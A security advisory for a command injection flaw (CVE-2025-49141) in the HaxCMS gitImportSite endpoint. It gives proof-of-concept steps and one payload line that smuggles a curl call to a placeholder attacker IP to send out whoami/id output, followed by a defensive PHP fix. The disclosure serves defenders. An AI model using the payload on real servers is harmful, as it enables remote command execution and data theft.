
CVE-2025-49141 @haxtheweb/haxcms-nodejs

Package

Manager: npm
Name: @haxtheweb/haxcms-nodejs
Vulnerable Version: >=0 <11.0.3

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.00576 (percentile 0.67822)

Details

HaxCMS-PHP Command Injection Vulnerability

### Summary

The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The 'set_remote' function later passes this input into 'proc_open', yielding OS command injection.

### Details

The vulnerability exists in the logic of the 'gitImportSite' function, located in 'Operations.php'. The current implementation relies only on the 'filter_var' and 'strpos' functions to validate the URL, which is not sufficient to ensure the absence of Bash special characters used for command injection.

![gitImportSite](https://github.com/user-attachments/assets/af9935ef-4735-446d-833f-2c2590ff1508)

#### Affected Resources

• Operations.php:2103 gitImportSite()
• `<domain>/<user>/system/api/gitImportSite`

### PoC

To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note that a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').

1. Start a webserver.
   ![webserver](https://github.com/user-attachments/assets/8594f9b1-67fa-4352-bbc3-310bb164ec9b)
2. Initiate a request to the 'archiveSite' endpoint.
   ![archiveSite](https://github.com/user-attachments/assets/08503f36-d984-4d53-8fe6-577ad78d5eb7)
3. Capture and modify the request in BurpSuite.
   ![request-modification](https://github.com/user-attachments/assets/61cd211e-afd3-453e-b86b-58bccffaf824)
4. Observe command output in the HTTP request from the server.
   ![command-output](https://github.com/user-attachments/assets/35f32274-b709-41d5-adaa-bea48f5cf33c)

#### Command Injection Payload

```bash
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
```

### Impact

An authenticated attacker can craft a URL string that bypasses the validation checks employed by the 'filter_var' and 'strpos' functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
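As an added defender-side illustration (not HaxCMS code), the following PHP shows the two fixes the weakness calls for: an explicit allowlist on the import URL, since 'filter_var' accepts strings like the payload above, and a 'proc_open' call that passes the URL as one argv element so no shell ever parses it. The function names, the https-only policy and the sample inputs are assumptions made for this example.

```php
<?php
// Added example, not HaxCMS code. Function names, the https-only policy
// and the sample inputs below are assumptions for illustration.
declare(strict_types=1);

/**
 * Return $url unchanged if it matches a conservative allowlist, else null.
 * FILTER_VALIDATE_URL accepts strings such as the advisory's payload, so it
 * is not a defence against shell metacharacters; an explicit character
 * class is: ';', '$', '{', '}', '(', ')', '#' and whitespace never match.
 */
function validateGitRemoteUrl(string $url): ?string
{
    if (strlen($url) > 2048 || strpos($url, '..') !== false) {
        return null;
    }
    // scheme, host, optional port, path limited to letters, digits, . _ - /
    $re = '~\Ahttps://[A-Za-z0-9.-]+(?::[0-9]{1,5})?/[A-Za-z0-9._/-]+\z~';
    return preg_match($re, $url) === 1 ? $url : null;
}

/**
 * Point the repository's origin at $validatedUrl. With an array command
 * (PHP >= 7.4) proc_open execs git directly, without /bin/sh, so the URL
 * is always a single argument and cannot terminate or chain commands.
 * Returns git's exit code, or -1 if the process could not be started.
 */
function setRemote(string $repoDir, string $validatedUrl): int
{
    $cmd  = ['git', '-C', $repoDir, 'remote', 'set-url', 'origin', $validatedUrl];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return -1;
    }
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Constructed inputs: a plain repository URL is accepted; a string shaped
// like the advisory's payload is rejected before any process is created.
var_dump(validateGitRemoteUrl('https://github.com/example/site.git'));
var_dump(validateGitRemoteUrl('https://203.0.113.5/.git;curl${IFS}203.0.113.5/$(id)#=x'));
```

Only a string that survives validateGitRemoteUrl() should ever reach setRemote(); the array form of proc_open is the part that removes the shell from the path entirely.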

Metadata

Created: 2025-06-09T20:30:34Z
Modified: 2025-06-20T17:24:48Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-g4cf-pp4x-hqgw/GHSA-g4cf-pp4x-hqgw.json
CWE IDs: ["CWE-78"]
Alternative ID: GHSA-g4cf-pp4x-hqgw
Finding: F404
Auto approve: 1